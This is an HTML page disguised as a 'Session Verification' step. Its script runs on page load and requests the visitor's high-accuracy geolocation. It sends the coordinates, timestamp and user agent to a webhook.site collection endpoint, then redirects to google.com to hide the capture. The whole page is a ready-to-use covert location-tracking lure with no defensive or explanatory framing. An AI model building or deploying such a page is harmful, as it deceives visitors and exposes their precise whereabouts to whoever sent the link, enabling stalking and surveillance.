
<!DOCTYPE html>
<html>
<head>
  <title>Session Verification</title>
</head>
<body>
  <h2>Verifying your session…</h2>
  <p>Please wait while we confirm your device location.</p>

  <script>
    function logLocation(position) {
      fetch('https://webhook.site/your-custom-endpoint', {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({
          latitude: position.coords.latitude,
          longitude: position.coords.longitude,
          accuracy: position.coords.accuracy,
          timestamp: new Date().toISOString(),
          userAgent: navigator.userAgent
        })
      });
      window.location.href = "https://google.com";
    }

    function errorHandler(error) {
      fetch('https://webhook.site/your-custom-endpoint', {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ error: error.message })
      });
    }

    if (navigator.geolocation) {
      navigator.geolocation.getCurrentPosition(logLocation, errorHandler, {
        enableHighAccuracy: true,
        timeout: 5000,
        maximumAge: 0
      });
    } else {
      errorHandler({ message: "Geolocation not supported" });
    }
  </script>
</body>
</html>
